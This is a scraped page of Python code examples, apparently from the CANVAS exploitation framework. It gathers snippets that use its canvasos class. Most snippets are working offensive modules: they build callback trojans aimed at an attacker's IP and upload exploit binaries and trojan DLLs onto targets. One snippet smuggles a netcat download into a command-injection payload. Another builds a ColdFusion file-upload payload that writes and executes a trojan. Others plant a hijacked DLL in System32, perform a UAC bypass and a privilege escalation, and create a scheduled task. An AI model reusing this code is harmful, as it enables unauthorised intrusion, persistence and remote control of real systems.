Beispiel #1
0
    def getPlatformInfo(self):
        """
        
        Very weird Windows 7 issue:
        http://www.techsupportforum.com/microsoft-support/windows-vista-windows-7-support/167785-running-cmd-exe.html
        http://social.technet.microsoft.com/Forums/en-US/w7itprogeneral/thread/2d506b96-e856-4752-90af-4f8194bb0040
        """
        if getattr(self, "failedDismallyAtPlatformInfo", False):
            self.log("No platform info available")
            return None

        # What about windows? XXX: implement boot.ini grabbing.
        #s = self.runcommand("cmd /c type %SYSTEMDRIVE%\\boot.ini")
        s = self.runcommand("cmd /c type %SYSTEMDRIVE%\\autoexec.bat")

        #this will work even when there is a cmd.exe in the path somewhere!
        if s and "NTVDM" in s:
            s = "Windows"
        else:
            s = self.runcommand("cmd /c ver")

            if s and "Windows" in s:
                s = "Windows"
            else:
                s = self.runcommand("ver.exe")

                if s and "Windows" in s:
                    s = "Windows"
                else:
                    s = self.runcommand("uname -a")

                    if len(s) == 0:
                        self.log("Failed to get PlatformInfo")
                        self.failedDismallyAtPlatformInfo = True
                        return None

                    self.log("Got platformInfo: %s" % s)
                    self.uname = s
                    os = canvasos()
                    os.load_uname(s)
                    ret = os
                    return ret

        if s == "Windows":
            os = canvasos()
            os.load_uname({
                "sysname": "Windows",
                "release": None,
                "machine": "x86"
            })
            return os

        return None
Beispiel #2
0
    def ncCallbackTrojan(self):
        # wait for a nc callback and send down a trojan

        trojancmd = "nc -n " + self.callback.ip + " " + str(
            self.data_port) + " >/tmp/a"
        payload = self.cmdExec.replace("THECMD",
                                       trojancmd.replace(" ", "${IFS}"))

        from libs.canvasos import canvasos
        my_os = canvasos("Linux")
        my_os.arch = "x86"

        self.log("Building MOSDEF trojan for: %s %s" % (my_os, my_os.arch))
        self.log("Callback set for: %s:%s" %
                 (self.callback.ip, self.callback.port))

        try:
            ret = self.buildmosdeftrojan(self.callback.ip,
                                         self.callback.port,
                                         target_os=my_os,
                                         universal=True)
        except Exception, err:
            self.log("Problem building the MOSDEF trojan: %s" % (err))
            self.setInfo("%s - failed" % (NAME))
            return 0
Beispiel #3
0
    def getInfo(self):
        os = canvasos("Windows")
        #self.hostsknowledge.get_localhost().add_knowledge("OS", os, 100)

        osinfo = self.shell.getOSInfo()
        if osinfo != None:
            if len(osinfo) > 1:
                self.hostsknowledge.get_localhost().add_knowledge(
                    "OS Version", osinfo[1], 100)
            if len(osinfo) > 2:
                self.hostsknowledge.get_localhost().add_knowledge(
                    "OS Version Number", osinfo[2], 100)
            if len(osinfo) > 0:
                self.hostsknowledge.get_localhost().add_knowledge(
                    "OS Architecture", osinfo[0], 100)
                if "32" in osinfo[0]:
                    os.arch = 'X86'
                elif "64" in osinfo[0]:
                    os.arch = 'X64'

        self.hostsknowledge.get_localhost().add_knowledge("OS", os, 100)

        psver = self.shell.getPSVersion()
        if psver != None:
            self.hostsknowledge.get_localhost().add_knowledge(
                "POWERSHELL Version", psver, 100)
        return os
Beispiel #4
0
    def build_universal_trojan(self, os_version="Linux", os_arch="X64"):
        '''
        Builds the callback.
        os_version must be "Linux" or "WINDOWS"
        os_arch must be "X86" or "X64"
        '''

        t_os = canvasos(os_version)
        t_os.arch = os_arch

        logging.info("Callback set to %s:%s" %
                     (self.callback.ip, self.callback.port))

        try:
            ret = self.buildmosdeftrojan(self.callback.ip,
                                         self.callback.port,
                                         target_os=t_os,
                                         universal=True,
                                         http=False,
                                         ssl=False)
            if ret:
                if os_version == 'WINDOWS':
                    cb_name = "cb_%s.exe" % os_arch
                else:
                    cb_name = "cb.linux.%s" % os_arch
                filename = os.path.join(self.respath, cb_name)
                with open(filename, "wb") as f:
                    f.write(self.mosdeftrojan)
                self.payload_fname = filename
        except Exception, err:
            logging.error("Problem building MOSDEF trojan: %s" % str(err))
            return False
Beispiel #5
0
    def run(self):
        self.get_args()
        self.setInfo('OS Detecting -> %s' % self.host)

        # main os base detection
        os = self.os_detect(self.host, self.node)

        # windows service pack detection ...
        if os and os.base.lower() in ['windows'] and self.sp == True:
            self.log('OS DETECT: running Service Pack detection ...')
            self.incr_prog('ServicePack')
            os = self.run_spdetect(os=os)

        # windows language detection
        if os and os.base.lower() in ['windows'
                                      ] and self.no_language_check != True:
            self.log('OS DETECT: running Language detection ...')
            self.incr_prog('Language')
            os = self.run_languagedetect(os=os)

        # can't determine target OS
        if not os and self.known == False:
            self.log('OS DETECT: Unable to determine OS ...')
            self.setInfo('OS DETECT: Unable to determine OS ...')
            self.target.add_knowledge('OS', canvasos.canvasos('Unknown'), 0)
            self.setProgress(100.0)
            return 0  # unable to determine ..

        # only add when we dont know ...
        if self.known == False:
            self.target.add_knowledge('OS', os, 100)
            self.setInfo("%s Found:  %s->%s (Via: %s)" %
                         (NAME, self.host, str(os), ','.join(self.via)))
            self.log("%s Found:  %s->%s (Via: %s)" %
                     (NAME, self.host, str(os), ','.join(self.via)))

            ##Print out sexy dataview formatted code
            self.do_data_view(col_title=["Host", "OS"],
                              data=[[self.host, str(os)]])

        else:
            # get known knowledge
            ret = self.target.get_knowledge('OS')
            if ret:
                os = ret.known
                self.setInfo("%s Found:  %s->%s" % (NAME, self.host, str(os)))
                self.log("%s Found:  %s->%s" % (NAME, self.host, str(os)))

                ##Print out sexy dataview formatted code
                self.do_data_view(col_title=["Host", "OS"],
                                  data=[[self.host, str(os)]])

            else:
                self.setProgress(100.0)
                return 0  # unable to determine ...

        # self.result is used in autoversioning ..
        self.result = os
        self.setProgress(100.0)
        return 1
Beispiel #6
0
    def getPlatformInfo(self):
        if getattr(self, "failedDismallyAtPlatformInfo", False):
            return None

        # What about windows? XXX: implement boot.ini grabbing.
        s = self.runcommand("cmd /c type %SYSTEMDRIVE%\\boot.ini")

        if len(s) == 0:
            s = self.runcommand("cmd /c ver")

        if len(s) == 0:
            s = self.runcommand("uname -a")

        if len(s) == 0:
            self.log("Failed to get PlatformInfo")
            self.failedDismallyAtPlatformInfo = True
            return None

        self.log("Got platformInfo: %s" % s)
        self.uname = s
        os = canvasos()
        os.load_uname(s)
        ret = os

        return ret
    def send_mosdef_trojan(self):
        ret = True
        try:
            server = gettcplistener(self.tcp_port)
            client, _ = server.accept()
            data = client.recv(256)
            arch = data.split('-')[0]

            if arch.lower() == 'x86_64':
                self.arch = 'X64'
            elif arch.lower() == 'i386':
                self.arch = 'X86'
            else:
                logging.info('OS not supported')
                raise ValueError(arch)

            t_os = canvasos("Linux")
            t_os.arch = self.arch
            self.buildmosdeftrojan(self.callback.ip,
                                   self.callback.port,
                                   target_os=t_os,
                                   universal=True)
            client.sendall(self.mosdeftrojan)
            client.close()
            server.close()
        except Exception as e:
            logging.error('Failed to detect architecture: %s' % str(e))
            ret = False

        return ret
    def make_dll(self):
        t_os = canvasos('WINDOWS')
        t_os.arch = "x64" if (self.is_64bit_node()
                              or self.has_wow64()) else "x86"

        if t_os.arch == "x64":
            plds = payloads64(dll=True)

            inner_pld = payloads64(module=self, dll=False)
            assembly_inner = inner_pld.callback(self.callback.ip,
                                                self.callback.port,
                                                universal=True)
            code_inner = inner_pld.assemble(assembly_inner)

            assembly_outer = plds.wrap_payload(code_inner)
            shellcode = plds.assemble(assembly_outer)

            myPElib = PElib(win64=1)
            trojan_dll = myPElib.createPEFileBuf({'DllMain': shellcode},
                                                 gui=False)
        else:
            plds = payloads(module=self, dll=True)
            assembly_inner = plds.callback(self.callback.ip,
                                           self.callback.port,
                                           universal=True)
            shellcode = plds.assemble(assembly_inner)

            myPElib = PElib()
            importante = myPElib.get_random_imports()
            trojan_dll = myPElib.createPEFileBuf({'DllMain': shellcode},
                                                 gui=False,
                                                 importante=importante)

        return trojan_dll
    def write_file_remote(self, winver):
        t_os = canvasos('WINDOWS')
        t_os.arch = "x64" if (self.is_64bit_node()
                              or self.has_wow64()) else "x86"

        xpl_orig_name = "exploit" + winver + "_x86.exe"
        if t_os.arch == "x64":
            xpl_orig_name = "exploit" + winver + "_x64.exe"

        local_exploit_path = os.path.join(self.binaries_path, xpl_orig_name)

        tmp_path = self.node.shell.GetTempPathA()
        if not tmp_path:
            logging.error("Could not resolve full temp directory path")
            return False
        else:
            logging.info("Temp directory: %s" % tmp_path)

        if self.node.shell.chdir(tmp_path) < 0:
            logging.error("Could not chdir into %s" % tmp_path)
            return False

        remote_exploit_name = "%s.exe" % random.randint(10001, 99999)
        remote_exploit_path = tmp_path + remote_exploit_name

        if not self.nodeUpload(local_exploit_path, remote_exploit_path):
            logging.error("Failed to upload the EXE")
            return False

        return remote_exploit_path
Beispiel #10
0
    def make_CF_payload(self):
        """
        Build our ColdFusion 'shell' that will dump our MOSDEF trojan to disk and execute it
        """
        from libs.canvasos import canvasos 
        my_os = canvasos("Windows")
        my_os.arch = "x86"
        self.log("Creating a callback to %s:%s"%(self.callback.ip, self.callback.port))
        if not self.buildmosdeftrojan(self.callback.ip, self.callback.port, target_os=my_os, universal=True):
            return False 
        
        base64data = base64.encodestring( self.mosdeftrojan )

        self.payload  = "--576a5sdf6\r\n"
        self.payload += "Content-Disposition: form-data; name=\"NewFile\"; filename=\"%s\"\r\n"%self.filename
        self.payload += "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        self.payload += """
            <cfset path = GetDirectoryFromPath( GetCurrentTemplatePath() ) >
            <cfsavecontent variable="o">BASE64DATA</cfsavecontent>
            <cfset d = toBinary(o)>
            <cfset f = "TROJANFILENAME">
            <cffile
                action ="write"
                file="#path#/#f#"
                output=#d#>

            <cfexecute name = "cmd" arguments = '/c #path##f#' timeout = "10"></cfexecute>\r\n"""
        self.payload = self.payload.replace("BASE64DATA", base64data).replace("TROJANFILENAME",self.trojanfile)
        
        self.payload += "--576a5sdf6--\r\n"

        self.log("Created a payload using name: %s"%self.trojanfile)
        return self.payload
Beispiel #11
0
    def make_dll(self):
        t_os = canvasos('WINDOWS')
        t_os.arch = "x64" if (self.is_64bit_node()
                              or self.has_wow64()) else "x86"

        if t_os.arch == "x64":
            plds = payloads64(dll=True)

            inner_pld = payloads64(module=self, dll=False)
            assembly_inner = inner_pld.callback(self.callback.ip,
                                                self.callback.port,
                                                universal=True)
            code_inner = inner_pld.assemble(assembly_inner)

            assembly_outer = plds.wrap_payload(code_inner)
            shellcode = plds.assemble(assembly_outer)

            myPElib = PElib(win64=1)
            trojan_dll = myPElib.createPEFileBuf({'DllMain': shellcode},
                                                 gui=False)
        else:
            trojan_dll = self.buildmosdeftrojan(self.callback.ip,
                                                self.callback.port,
                                                target_os=t_os,
                                                universal=True,
                                                encrypted=False,
                                                dll=True,
                                                win8_compatible=True)

            trojan_dll = self.mosdeftrojan

        return trojan_dll
Beispiel #12
0
 def get_os(self):
     """
     Get the operating system (as a guess) from the 
     RPC information we just grabbed
     Now a member function of canvasos object
     """
     ret = canvasos("Unknown")
     ret.guess_from_rpcdump(self.resultList)
     return ret
Beispiel #13
0
    def create_trojan(self):
        t_os = canvasos('WINDOWS')
        t_os.arch = 'X86'

        trojan = self.buildmosdeftrojan(self.callback.ip,
                                        self.callback.port,
                                        t_os,
                                        universal=True,
                                        win8_compatible=True)
Beispiel #14
0
    def bm_prepare_executables(self, tmp_directory):
        c_string_padding = "A" * 300

        exploit_name = "%s.exe" % random.randint(1001, 2000)
        exploit_local_path = os.path.join(self.local_res,
                                          "tmp_%s" % exploit_name)
        exploit_rem_path = tmp_directory + exploit_name

        mosdef_dll_name = "%s.exe" % random.randint(2001, 3000)
        mosdef_local_path = os.path.join(self.local_res,
                                         "tmp_%s" % mosdef_dll_name)
        mosdef_rem_path = tmp_directory + mosdef_dll_name

        return_value = [(exploit_local_path, exploit_rem_path),
                        (mosdef_local_path, mosdef_rem_path)]

        exploit_orig_name = "bm_exploit32.exe"
        if self.is_64bit_node() or self.has_wow64():
            exploit_orig_name = "bm_exploit64.exe"

        # Generate the MOSDEF executable

        t_os = canvasos('WINDOWS')
        t_os.arch = 'X64' if self.is_64bit_node() or self.has_wow64(
        ) else 'X86'

        created_trojan = self.buildmosdeftrojan(self.callback.ip,
                                                self.callback.port,
                                                t_os,
                                                universal=True)

        if created_trojan != True:
            self.log_error("Error in generating our MOSDEF executable")
            return None
        else:
            logging.info("Writing MOSDEF callback to %s" % mosdef_local_path)

            with open(mosdef_local_path, "wb") as handle:
                handle.write(self.mosdeftrojan)

        exploit_data = None

        with open(os.path.join(self.local_res, exploit_orig_name),
                  "rb") as handle:
            exploit_data = handle.read()

        exploit_data = self.replace_unicode_string(
            exploit_data, "MOSDEF_SHIM_DLL_PATH" + c_string_padding,
            mosdef_rem_path)

        logging.info("Writing exploit to %s" % exploit_local_path)

        with open(exploit_local_path, "wb") as handle:
            handle.write(exploit_data)

        return return_value
Beispiel #15
0
    def write_files_remote(self):
        paths = {}

        tmp_path = self.node.shell.GetTempPathA()
        if not tmp_path:
            logging.error("Could not resolve full temp directory path")
            return None
        else:
            logging.info("Temp directory: %s" % tmp_path)

        if self.node.shell.chdir(tmp_path) < 0:
            logging.error("Could not chdir into %s" % tmp_path)

        remote_exploit_name = "%s.exe" % random.randint(10001, 99999)
        remote_exploit_path = tmp_path + remote_exploit_name
        local_tmp_exploit_path = os.path.join(self.binaries_path, remote_exploit_name)

        paths['local_tmp_exploit_path'] = local_tmp_exploit_path
        paths['remote_exploit_name'] = remote_exploit_name
        paths['remote_exploit_path'] = remote_exploit_path

        trojan_dll = self.make_dll()

        t_os = canvasos('WINDOWS')
        t_os.arch = "x64" if (self.is_64bit_node() or self.has_wow64()) else "x86"

        xpl_orig_name = "exploit_x86.exe"
        if t_os.arch == "x64":
            xpl_orig_name = "exploit_x64.exe"

        local_exploit_path = os.path.join(self.binaries_path, xpl_orig_name)

        with open(local_exploit_path, "rb") as f:
            xpl_binary = f.read()

        len_trojan_dll = len(trojan_dll)

        if (len_trojan_dll > 20000):
            logging.error("The trojan size is greater than the exploit buffer")
            return None

        pos = xpl_binary.find('NOX') + 4
        xpl_binary.replace("NOX\0", struct.pack('<L', len_trojan_dll))

        tmp_xpl = xpl_binary[:pos]
        tmp_xpl += trojan_dll
        tmp_xpl += xpl_binary[pos+len_trojan_dll:]

        with open(local_tmp_exploit_path, "wb") as f:
            f.write(tmp_xpl)

        if not self.nodeUpload(local_tmp_exploit_path, remote_exploit_path):
            logging.error("Error while uploading exploit binary")
            return None

        return paths
 def build_mosdef_trojan(self):
     ret = None
     t_os = canvasos("Linux")
     t_os.arch = 'X64' if self.arch == 'x86_64' else 'X86'
     try:
         ret = self.buildmosdeftrojan(self.callback.ip,
                                      self.callback.port,
                                      target_os=t_os,
                                      universal=True)
     except Exception, err:
         logging.info("Error while building MOSDEF callback: %s" % str(err))
Beispiel #17
0
 def getPlatformInfo(self):
     s = self.runPhp("php_uname()")
     self.log("Got platformInfo: %s" % s)
     if len(s):
         self.uname = s
         os = canvasos()
         os.load_uname(s)
         ret = os
     else:
         ret = None
     return ret
    def prepare_artifacts(self, tmp_directory):
        sct_name = "%s.sct" % str(random.randint(100001, 2000000))
        sct_local_path = os.path.join(self.local_res, "tmp_%s" % sct_name)
        sct_rem_path = tmp_directory + sct_name

        mosdef_name = random_string(len("mosdefcallback")) + ".exe"
        mosdef_local_path = os.path.join(self.local_res, "tmp_%s" % mosdef_name)
        mosdef_rem_path = tmp_directory + mosdef_name

        return_value = [(sct_local_path, sct_rem_path),
                        (mosdef_local_path, mosdef_rem_path)]

        # Generate the MOSDEF executable

        t_os = canvasos('WINDOWS')
        t_os.arch = 'X64' if self.is_64bit_node() or self.has_wow64() else 'X86'

        created_trojan = self.buildmosdeftrojan(self.callback.ip, self.callback.port, t_os, universal=True)

        if created_trojan != True:
            logging.error("Error in generating our MOSDEF executable")
            return None
        else:
            logging.info("Writing MOSDEF callback to %s" % mosdef_local_path)

            with open(mosdef_local_path, "wb") as handle:
                handle.write(self.mosdeftrojan)

        sct_data = None

        with open(os.path.join(self.local_res, "template.sct"), "rb") as handle:
            sct_data = handle.read()

        sct_replacers = self.get_replacers(sct_data)
        
        for replacer in sct_replacers:
            if replacer == "{mosdefpath}":
                sct_data = sct_data.replace(replacer, mosdef_rem_path.replace("\\", "\\\\"))
            else:
                replacer_string = random_string(random.randint(1, 8))
                
                sct_data = sct_data.replace(replacer, replacer_string)
                if replacer == "{randomtaskname}":
                    logging.info("Injected scheduled task name: %s" % replacer_string)

        logging.info("Writing SCT file to %s" % sct_local_path)
        logging.info("Writing callback file to %s" % mosdef_local_path)

        with open(sct_local_path, "wb") as handle:
            handle.write(sct_data)

        return return_value
Beispiel #19
0
    def makedownloadfile(self):
        logging.debug('Creating mosdef payload')
        logging.debug('\tIP: {}\tPort: {}'.format(self.callback.ip, self.callback.port))

        t_os = canvasos("Linux")
        t_os.arch = self.arch

        ret = self.buildmosdeftrojan(self.callback.ip,
                                     self.callback.port,
                                     target_os=t_os,
                                     universal=True)
        
        return self.mosdeftrojan
Beispiel #20
0
    def test(self):
        """
        Quicky banner check - looks for comon basepaths
        """
        self.getargs()
        self.log("Using basepath=%s" % self.basepath)
        #automatically check out some common basepaths, starting with the one specified
        if not self.ssl:
            #currently we only check the banner if we are not ssl
            ret = self.bannerchecktest({"IIS/5.0": 1},
                                       sendstr="HEAD / HTTP/1.0\r\n\r\n")
            print "after bannerchecktest"
            print ret
            if not ret:
                self.log("Failed to find IIS")
                return 0

        for basepath in [
                self.basepath, "/scripts/", "/msadc/", "/_vti_bin/",
                "/iisadmpwd/"
        ]:
            self.log("Testing for basepath: %s" % basepath)
            self.argsDict["basepath"] = basepath
            self.basepath = basepath
            self.outputdir = "winnt/system32/"
            self.set_prefix()

            #command="dir"
            command = self.command
            data = self.run_command(command)

            #we don't get the header here (we use spkproxy.urlopen)
            if type(data) == type("") and "<DIR>" in data:
                #we don't look for "directory" or other
                #english strings because that would
                #be localization dependant
                self.log("Found executable directory with prefix %s" %
                         self.prefix)
                newos = canvasos()
                newos.base = "Windows"
                newos.version = "2000"
                newos.arch = "x86"
                self.target_os = newos
                #we specifically CANT do debug.exe method
                #in IIS
                #self.capabilities+=["debug.exe"]
                self.capabilities += ["tftp"]
                self.version = 1
                return ret
        self.version = 0  #we failed
        return 0
    def make_dll_last_win(self):
        t_os = canvasos('WINDOWS')
        t_os.arch = "x64" if (self.is_64bit_node()
                              or self.has_wow64()) else "x86"

        dll_name = ""

        if t_os.arch == "x64":
            dll_name = "dll_x64.dll"
            plds = payloads64(
                module=self,
                dll=False)  # False-> terminate thread // True -> ret
        else:
            dll_name = "dll_x86.dll"
            plds = payloads(module=self, dll=False)

        assembly_inner = plds.callback(self.callback.ip,
                                       self.callback.port,
                                       universal=True)
        code_inner = plds.assemble(assembly_inner)
        code_len = len(code_inner)

        local_dll_path = os.path.join(self.binaries_path, dll_name)

        with open(local_dll_path, 'rb') as f:
            local_dll_binary = f.read()

        pos = local_dll_binary.find("NOX")
        tmp_dll_binary = local_dll_binary[:pos]
        tmp_dll_binary += code_inner
        tmp_dll_binary += local_dll_binary[pos + len(code_inner):]

        tmp_dll_name = "%s.dll" % random.randint(10001, 99999)
        tmp_dll_path = os.path.join(self.binaries_path, tmp_dll_name)
        logging.info(tmp_dll_path)
        with open(tmp_dll_path, 'wb') as f:
            f.write(tmp_dll_binary)

        windir = self.node.shell.GetEnvironmentVariable('SystemRoot')
        if self.has_wow64():
            remote_dll_path = windir + "\\Sysnative\\windowscoredeviceinfo.dll"
        else:
            remote_dll_path = windir + "\\System32\\windowscoredeviceinfo.dll"

        if not self.nodeUpload(tmp_dll_path, remote_dll_path):
            os.unlink(tmp_dll_path)
            return False

        os.unlink(tmp_dll_path)

        return True
Beispiel #22
0
    def getInfo(self):

        s = self.sysinfo(val="ALL")
        self.log("Got sysinfo: %s" % s)
        if len(s):
            self.uname = s
            os = canvasos()
            os.load_uname(s)
            ret = os
            self.hostsknowledge.get_localhost().add_knowledge("OS", os, 100)
        else:
            ret = None

        return ret
Beispiel #23
0
 def maketrojan(self):
     from libs.canvasos import canvasos
     my_os = canvasos("Linux")
     my_os.arch = 'X86'
     self.log("[D2] Creating a callback to %s:%s" %
              (self.callback.ip, self.callback.port))
     if not self.buildmosdeftrojan(self.callback.ip,
                                   self.callback.port,
                                   target_os=my_os,
                                   universal=True):
         return 0
     file(self.trojanname, "wb").write(self.mosdeftrojan)
     ret = len(self.mosdeftrojan) != 0
     return ret
Beispiel #24
0
 def maketrojan(self):
   from libs.canvasos import canvasos
   my_os = canvasos(targets[self.version])
   my_os.arch = 'X86' 
   self.log("Creating a callback to %s:%s"%(self.callback.ip, self.callback.port))
   if not self.buildmosdeftrojan(self.callback.ip, self.callback.port, target_os=my_os, universal=True):
     return 0 
   if self.version == 0:
     self.htafile = self.file4hta(self.mosdeftrojan)
     file(self.trojanname, "wb").write(self.htafile)
     self.setInfo("%s - done"%(NAME))
   else:
     file(self.trojanname, "wb").write(self.mosdeftrojan)
   ret = len(self.mosdeftrojan) != 0
   return ret
Beispiel #25
0
    def create_callback(self):
        t_os = canvasos('WINDOWS')
        t_os.arch = 'X64' if self.is_64bit_node() or self.has_wow64(
        ) else 'X86'

        logging.info("Building callback to ip:%s, port:%d, architecture:%s" %
                     (self.callback.ip, self.callback.port, t_os.arch))
        self.buildmosdeftrojan(self.callback.ip,
                               self.callback.port,
                               t_os,
                               universal=True)
        callback_path = os.path.join(
            self.output(ip=self.node.get_interesting_interface(),
                        subdir="tpminit_wbemcomn"),
            self.filename_generator(len("trojan")) + ".exe")
        with open(callback_path, "wb") as handle:
            handle.write(self.mosdeftrojan)
        return callback_path
Beispiel #26
0
    def create_trojan(self):
        t_os = canvasos('WINDOWS')
        if self.x64:
            t_os.arch = 'X64'
        else:
            t_os.arch   = 'X86'

        trojan = self.buildmosdeftrojan(self.callback.ip, self.callback.port, t_os, universal=True, win8_compatible=True)

        if trojan != True:
            logging.error('Building mosdef trojan failed')
            return 0

        # Write the trojan to the fs
        fd = open(self.trojan_name, "wb")
        fd.write(self.mosdeftrojan)
        fd.close()

        return self.mosdeftrojan
    def getShellcode(self):
        self.callback.ip = self.callback_host
        self.callback.port = int(self.callback_port)
        t_os = canvasos("Linux")
        t_os.arch = self.arch
        logging.info("Building Linux MOSDEF trojan - %s:%s" %
                     (self.callback.ip, str(self.callback.port)))

        try:
            self.buildmosdeftrojan(self.callback.ip,
                                   self.callback.port,
                                   target_os=t_os,
                                   http=self.mosdef_http,
                                   ssl=self.mosdef_ssl,
                                   universal=self.mosdef_universal,
                                   encrypted=self.mosdef_encrypted)
        except Exception, err:
            traceback.print_exc()
            logging.error("Problem building the MOSDEF trojan: %s" % (err))
            return None
Beispiel #28
0
    def set_up_smb_server(self):
        self.log("WP> Starting SMB Server on 0.0.0.0:445")
        mysmb = SMBServer('0.0.0.0', 445)
        mysmb.timeout = 30

        my_os = canvasos("Windows")
        my_os.arch = "x86"

        try:
            ret = self.buildmosdeftrojan(self.callback.ip,
                                         self.callback.port,
                                         target_os=my_os,
                                         http=False,
                                         ssl=False,
                                         universal=True)
        except Exception, err:
            self.log("WP> Problem building MOSDEF PE Trojan: %s" % (err))
            self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
                         (NAME, self.host, self.port))
            return 0
Beispiel #29
0
    def create_callback(self):
        t_os = canvasos('WINDOWS')
        t_os.arch = 'X64' if self.is_64bit_node() or self.has_wow64(
        ) else 'X86'

        logging.info("Building callback to ip:%s, port:%d, architecture:%s" %
                     (self.callback.ip, self.callback.port, t_os.arch))
        self.buildmosdeftrojan(self.callback.ip,
                               self.callback.port,
                               t_os,
                               universal=True)
        callback_path = os.path.join(
            self.output(ip=self.node.get_interesting_interface(),
                        subdir="sdclt_uac_bypass"),
            "%d.exe" % random.randint(0, 100000000))

        with open(callback_path, "wb") as handle:
            handle.write(self.mosdeftrojan)

        return callback_path
Beispiel #30
0
    def run(self):
        self.setInfo("%s" % (NAME))
        node = self.argsDict["passednodes"][0]
        self.node = node
        ret = 0
        #If we are patched we dont want to run
        lib = {}
        lib['c:\\windows\\system32\\rtutils.dll'] = '6.1.7600.16617'
        if not self.check_if_vulnerable(lib):
            ret = 0

        if "win32api" in node.capabilities:
            shell = node.shell

            if not self.callback:
                #usually the engine takes care of this
                self.log("Need a callback for this exploit!")
                ret = 0

            ret, nodeos = node.shell.GetVersionEx()
            minor = nodeos['Minor Version']
            major = nodeos['Major Version']
            if major != 6:
                self.log(
                    'Windows %d.%d not supported, expecting 6.1 Win2k8/Win7' %
                    (major, minor))
                ret = 0
            self.log('Attacking Windows %d.%d' % (major, minor))

            #Upload a new mosdef file.
            t_os = canvasos('WINDOWS')
            t_os.arch = 'X86'
            trojan = self.buildmosdeftrojan(self.callback.ip,
                                            self.callback.port,
                                            t_os,
                                            universal=True)

            if trojan != True:
                self.log('building mosdef trojan failed')
                ret = 0

            #use pelib to build the universal callback shellcode into a trojan .exe
            fi = 'a%d.exe' % (random.randint(0, 1000))
            f = open(fi, 'w')
            f.write(self.mosdeftrojan)
            f.close()

            remote_filename_exe = 'tempfile%d.exe' % random.randint(0, 1000)
            try:
                ret = self.node.shell.upload(source=fi,
                                             destfilename=remote_filename_exe)
            except canvaserror.NodeCommandError, message:
                self.log("Could not upload files!, changing dir.")

                tempdir = node.shell.GetEnvironmentVariable("TEMP")
                self.log("Chdiring into %s on node %s" %
                         (tempdir, node.getname()))
                chdir_ret = node.shell.chdir(tempdir)
                if chdir_ret != -1:
                    #success!
                    self.log(
                        "Running attack in the tempdir to see if that helps")
                    ret = self.node.shell.upload(
                        source=fi, destfilename=remote_filename_exe)
                    self.log("Attack returned: %s" % ret)
                else:
                    self.log("Could not chdir into %s - bailing out" % tempdir)
                    self.setInfo(
                        "%s: Could not find writable directory (failed)" %
                        NAME)
                    ret = 0

            os.remove(fi)

            vars = {}
            code = self.makecode(remote_filename_exe)
            try:
                shell.clearfunctioncache()
                request = shell.compile(code, vars)
                shell.sendrequest(request)
                #return from CreateProcessAsUser
                return_value = shell.readint()
                #if it fails, should send GetLastError
                if return_value == 0:
                    err = shell.readint()
                    shell.leave()
                    if err == 0xfffffff:
                        self.log('Couldnt write in registry')
                    elif err == 0xffffffe:
                        self.log('The exploit timed out')
                    else:
                        self.log('Error from GetLastError: 0x%x' % (err))
                    #remove unused file if exploit fails
                    ret = self.node.shell.unlink(remote_filename_exe)
                    self.log('Removing remote file returned: %s' % (ret))
                    ret = 0
                else:
                    self.log('New impersonated process was created')
                    self.log("You should see another node appearing now")

                shell.leave()
                if self.ISucceeded():
                    ret = 1
                else:
                    ret = 0
            except Exception as e:
                self.node.shell.unlink(remote_filename_exe)
                ret = 0